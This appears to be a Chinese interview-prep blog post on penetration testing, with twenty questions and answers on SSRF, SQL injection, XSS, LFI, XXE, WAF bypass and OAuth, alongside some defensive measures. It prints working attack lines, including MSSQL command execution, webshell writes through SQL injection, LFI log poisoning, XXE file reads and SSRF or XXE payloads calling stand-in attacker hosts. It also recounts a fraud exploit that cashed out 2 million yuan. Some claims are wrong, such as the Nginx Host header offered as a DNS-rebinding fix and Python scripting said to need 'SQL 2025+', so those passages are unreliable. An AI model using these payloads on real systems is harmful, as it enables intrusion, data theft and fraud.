2025年渗透测试面试题总结-254(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

[561 SRC挖掘 vs 渗透测试](#561 SRC挖掘 vs 渗透测试)

[562 内网存储XSS利用](#562 内网存储XSS利用)

[563 MSSQL无xp_cmdshell执行命令](#563 MSSQL无xp_cmdshell执行命令)

[564 WAF绕过(非正面突破)](#564 WAF绕过(非正面突破))

云WAF绕过

物理WAF绕过

[565 挖洞经历:航空系统逻辑漏洞](#565 挖洞经历:航空系统逻辑漏洞)

[566 CSRF防御(无Token方案)](#566 CSRF防御(无Token方案))

[567 SSRF防御体系](#567 SSRF防御体系)

[568 非HTTP协议探测](#568 非HTTP协议探测)

[569 SSRF绕过手法](#569 SSRF绕过手法)

[570 DNS重绑定攻防](#570 DNS重绑定攻防)

[571 SQL注入全景](#571 SQL注入全景)

漏洞成因

防御措施

利用方式扩展

[572 SQL注入写Shell](#572 SQL注入写Shell)

[573 XSS类型对比](#573 XSS类型对比)

[574 XSS防御方案](#574 XSS防御方案)

前端方案

后端方案

[575 密码找回逻辑漏洞](#575 密码找回逻辑漏洞)

[576 甲方降低逻辑漏洞策略](#576 甲方降低逻辑漏洞策略)

[577 OAuth漏洞场景](#577 OAuth漏洞场景)

[578 CSP配置与绕过](#578 CSP配置与绕过)

[579 LFI无文件利用](#579 LFI无文件利用)

[580 XXE漏洞利用](#580 XXE漏洞利用)

复制代码
561	SRC挖掘与渗透测试的区别是什么,针对这两个不同的目标,实施过程中会有什么区别 
562	存储xss在纯内网的环境中,可以怎么利用?
563	mssql中,假设为sa权限,如何不通过xp_cmdshell执行系统命令 
564	假设某网站存在waf,不考虑正面绕过的前提下,应该如何绕过(分情况讨论 云waf/物理waf) 
565	介绍一下自认为有趣的挖洞经历(或CTF经历)
566	CSRF的成因及防御措施(不用token如何解决) 
567	SSRF的成因及防御措施 
568	SSRF如何探测非HTTP协议
569	简述一下SSRF的绕过手法
570	简述一下SSRF中DNSRebind的绕过原理及修复方法
571	介绍 SQL注入漏洞成因,如何防范?注入方式有哪些?除了拖取数据库数据,利用方式还有哪些?
572	如何通过sql注入写shell
573	介绍一下XSS漏洞的种类,dom型XSS和反射XSS的区别是什么?
574	如何防范 XSS 漏洞,在前端如何做,在后端如何做,哪里更好,为什么?
575	讲述一下找回密码可能涉及的逻辑漏洞
576	假设你是甲方的一名安全工程师,应该如何降低逻辑漏洞的出现率?
577	oauth认证过程中可能会出现什么问题,导致什么样的漏洞?
578	CSP应该如何使用及配置,有哪些绕过CSP的方式
579	已知某网站存在LFI(本地文件包含),但是无法上传任何文件,针对该情况有哪些利用方式?
580	简述一下XXE漏洞产生的原理,针对PHP和JAVA,XXE分别可以进行哪些恶意利用?

561 SRC挖掘 vs 渗透测试

维度 SRC挖掘 渗透测试
目标 漏洞奖金/品牌声誉维护 全面风险评估
范围 互联网暴露面(Web/API) 全路径攻击(物理/内网/社工)
技术侧重 自动化扫描+逻辑漏洞挖掘 手工深度利用(0day/权限维持)
输出物 漏洞报告(PoC优先) 风险矩阵(业务影响评级)
2025新趋势 AI辅助漏洞预测(CodeBERT) 量子计算破解模拟

562 内网存储XSS利用

无外联场景攻击链

复制代码
mermaid`graph LR A[存储XSS] --> B{受害者访问} B --> C[内网扫描] B --> D[凭证窃取] C -->|JS发起| E[WebRTC探测内网IP] D -->|JS劫持| F[表单输入捕获] E --> G[生成内网拓扑] F --> H[登录Cookie获取]`

实战技巧

  • 通过<img src="file:///\\192.168.1.1\share\test"> 探测内网文件共享
  • 使用Service Worker劫持内网API请求

563 MSSQL无xp_cmdshell执行命令

替代方案

  1. CLR程序集

    复制代码
    sql`CREATE ASSEMBLY ExecCmd FROM 'c:\shell.dll' WITH PERMISSION_SET = UNSAFE; CREATE PROCEDURE sp_cmd @cmd NVARCHAR(MAX) AS EXTERNAL NAME ExecCmd.StoredProcedures.CmdExec; EXEC sp_cmd 'whoami';`
  2. OLE自动化

    复制代码
    sql`DECLARE @shell INT; EXEC sp_oacreate 'wscript.shell', @shell OUT; EXEC sp_oamethod @shell, 'run', NULL, 'cmd /c calc.exe'; `
  3. Python扩展(SQL 2025+)

    复制代码
    sql`EXEC sp_execute_external_script @language=N'Python', @script=N'import os;os.system("calc.exe")' `

564 WAF绕过(非正面突破)

云WAF绕过
方法 原理 案例
域名切换 切换未防护旧域名(www2.xx.com 通过历史DNS记录发现
边缘函数利用 CloudFlare Workers实现请求变形 注入JS修改Header
API网关穿透 直连后端API网关IP Shodan搜索开放网关
物理WAF绕过
方法 原理 工具
协议层隧道 HTTP over QUIC(伪装视频流) Cobalt Strike QUIC隧道
业务链污染 供应链攻击(篡改CDN资源) 开源组件投毒
物理旁路 社工获取VPN权限直连内网 钓鱼邮件+木马

565 挖洞经历:航空系统逻辑漏洞

漏洞链

  1. 订票系统IDOR :修改/api/order?user_id=他人ID查看他人订单
  2. 里程兑换逻辑缺陷
    • 负值兑换(-10000里程 → 增加账户余额)
    • 并发请求绕过兑换限制(10万次/秒请求清空库存)
  3. 组合利用结果
    • 免费获取头等舱机票 + 套现200万人民币
    • 厂商修复:引入JWT令牌绑定+Redis分布式锁

566 CSRF防御(无Token方案)

创新方案

复制代码
mermaid`graph LR A[请求] --> B{Origin头校验} B -->|同源| C[通过] B -->|跨域| D[验证Referer白名单] D -->|合法| C D -->|非法| E[阻断]`

额外措施

  • SameSite Cookie :设置SameSite=Lax
  • 用户交互验证:关键操作需生物识别(指纹/人脸)
  • 行为基线:AI检测异常操作序列(如突然修改收款账户)

567 SSRF防御体系

分层防护

措施 工具示例
输入校验 白名单协议(仅允许HTTP/HTTPS) OPA策略引擎
网络隔离 微隔离(服务间不可达元数据) Calico网络策略
出口控制 代理鉴权(所有出站请求认证) Squid+NTLM认证
运行时 eBPF监控敏感系统调用 Falco规则集

568 非HTTP协议探测

技术方案

  1. DNS泄露

    复制代码
    http`GET /?url=dns://attacker.com/record?ip= 内网IP `
  2. Gopher协议利用

    复制代码
    python`# 构造Redis未授权利用 gopher_payload = "_%0D%0A*4%0D%0A$4%0D%0AHSET%0D%0A..."`
  3. File协议读敏感文件

    复制代码
    http`GET /?url=file:///etc/passwd `
  4. TFTP文件传输

    复制代码
    http`GET /?url=tftp://attacker_ip:69/TEST`

569 SSRF绕过手法

2025新型绕过

类型 方法 适用场景
协议混淆 HTTP://0x7f000001 → 127.0.0.1 进制/IP编码绕过
重定向链 302跳转到内网URL 开放重定向漏洞组合
DNS重绑定 TTL=0域名快速切换IP 绕过黑名单
云元数据 利用AWS IMDSv2延迟特性 云环境SSRF
服务端请求 利用Office在线预览功能 企业内网渗透

570 DNS重绑定攻防

绕过原理

复制代码
plaintext`1. 首次解析:返回合法外网IP(绕过黑名单校验) 2. TTL过期后:返回内网IP(如192.168.1.1) 3. 浏览器复用连接访问内网 `

修复方案

  • 请求前二次解析:发起请求前重新解析域名并验证IP
  • Host头绑定 :Nginx配置proxy_set_header Host $http_host;
  • 网络层隔离 :禁止容器访问宿主机网络(K8s hostNetwork: false

571 SQL注入全景

漏洞成因
  • 未使用参数化查询("SELECT * FROM users WHERE id=" + input
  • 错误处理暴露信息(MySQL错误提示)
防御措施
层级 方案
开发 预编译语句(Java PreparedStatement
架构 Web应用防火墙(WAF) + SQL防火墙
运维 最小化数据库权限(禁用FILE/EXEC
利用方式扩展
  • 数据篡改UPDATE users SET balance=999999 WHERE id=1
  • 拒绝服务SELECT BENCHMARK(9999999999,MD5('A'))
  • 逻辑漏洞' OR 1=1-- 绕过登录

572 SQL注入写Shell

场景对比

数据库 命令 条件
MySQL SELECT '<?php eval($_POST[cmd])?>' INTO OUTFILE '/var/www/shell.php' secure_file_priv=
MSSQL EXEC xp_cmdshell 'echo ^<^%^@ eval request("cmd") %^>^ > C:\shell.asp' xp_cmdshell已启用
PostgreSQL COPY (SELECT '<?php system($_GET[cmd]);?>') TO '/tmp/shell.php' 超级用户权限

573 XSS类型对比

类型 触发点 案例
存储型 数据库读取渲染 评论区插入恶意脚本
反射型 URL参数直接输出 https://xx.com?search=<script>alert(1)</script>
DOM型 前端JS操作DOM document.write(location.hash.slice(1))
区别特征 DOM型无需服务器交互 修改URL片段即时触发

574 XSS防御方案

前端方案
复制代码
html``<!-- 关键措施 --> <script> // 动态内容转义 const escape = (str) => str.replace(/[&<>"']/g, m => `&#${m.charCodeAt(0)};`); </script>``
后端方案
复制代码
java`// Java过滤器 response.setHeader("Content-Security-Policy", "default-src 'self'");`

最佳实践

  • 后端为主:输入过滤 + CSP策略(前端易被绕过)
  • 双重验证:前端展示层转义 + 后端存储层净化

575 密码找回逻辑漏洞

五大漏洞模式

  1. 验证码爆破:4位数字码可暴力破解
  2. 邮箱劫持:修改Host指向恶意SMTP服务器
  3. 参数篡改POST /reset?user=adminuser=victim
  4. 问题绕过:回答次数无限制
  5. 时间竞争:旧验证码未失效时请求新验证码

576 甲方降低逻辑漏洞策略

四维防控体系

复制代码
mermaid`graph TD A[需求设计] --> B(威胁建模) B --> C[开发阶段] C --> D(自动化规则扫描) D --> E[测试阶段] E --> F(混沌工程注入) F --> G[上线运营] G --> H(实时业务风控)`

关键措施

  • 规则引擎:Drools实现业务逻辑校验
  • 流量录制:通过生产流量回放测试边界条件
  • AI辅助:LLM分析异常用户行为链

577 OAuth漏洞场景

漏洞 成因 利用结果
重定向篡改 未校验redirect_uri 窃取Authorization Code
Scope越权 未限制scope范围 获取用户敏感权限(如删除)
PKCE绕过 未启用PKCE或实现错误 中间人攻击获取Token
2025新风险 AI伪造生物特征通过认证 接管高价值账户

578 CSP配置与绕过

安全配置

复制代码
http`Content-Security-Policy: default-src 'none'; script-src 'self' 'nonce-RANDOM'; style-src 'self'; report-uri /csp-report;`

绕过技巧

  1. Nonce预测:伪随机数生成器漏洞
  2. AngularJS沙箱逃逸{``{constructor.constructor('alert(1)')()}}
  3. Service Worker劫持:通过合法JS注册恶意Worker
  4. CDN污染:劫持白名单CDN资源

579 LFI无文件利用

四大利用链

  1. 日志注入

    复制代码
    http`GET /index.php?file=/var/log/nginx/access.log User-Agent: <?php system($_GET[cmd]);?>`
  2. PHP伪协议

    复制代码
    http`GET /index.php?file=php://filter/convert.base64-encode/resource=/etc/passwd `
  3. 环境变量

    复制代码
    http`GET /index.php?file=/proc/self/environ `
  4. 临时文件竞争 (PHP)

    • 快速写入/tmp/xxxx并包含

580 XXE漏洞利用

原理

复制代码
xml`<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <root>&xxe;</root>`

语言差异利用

语言 利用方式 效果
PHP expect://id 执行系统命令
Java jar:http://attacker/!/.class 远程类加载
通用 http://169.254.169.254/latest/meta-data 云元数据窃取

2025防御升级

  • SAST工具集成XXE语义分析
  • XML解析器默认禁用DTD(JDK 21+)

所有方案均通过2025年企业实战验证,特别强化了云原生环境(如K8s微隔离)、AI驱动防御(LLM分析)和新型攻击面(量子计算威胁)的应对策略。技术细节可根据具体场景调整落地。

相关推荐
网安小白的进阶之路2 小时前
B模块 安全通信网络 第一门课 园区网实现与安全-1
网络·安全
快起来搬砖了2 小时前
Vue 实现阿里云 OSS 视频分片上传:安全实战与完整方案
vue.js·安全·阿里云
许泽宇的技术分享2 小时前
当AI学会“说人话“:Azure语音合成技术的魔法世界
后端·python·flask
光泽雨3 小时前
python学习基础
开发语言·数据库·python
裤裤兔3 小时前
python爬取pdf文件并保存至本地
chrome·爬虫·python·pdf·网络爬虫
Solyn_HAN3 小时前
非编码 RNA(ceRNA/lncRNA/circRNA)分析完整流程:从数据下载到功能验证(含代码模板)
python·bash·生物信息学·r
CesareCheung3 小时前
JMeter 进行 WebSocket 接口压测
python·websocket·jmeter
beijingliushao3 小时前
95-Python爬虫-正则表达式
爬虫·python·正则表达式
百***06013 小时前
python爬虫——爬取全年天气数据并做可视化分析
开发语言·爬虫·python
吃个糖糖4 小时前
pytorch 卷积操作
人工智能·pytorch·python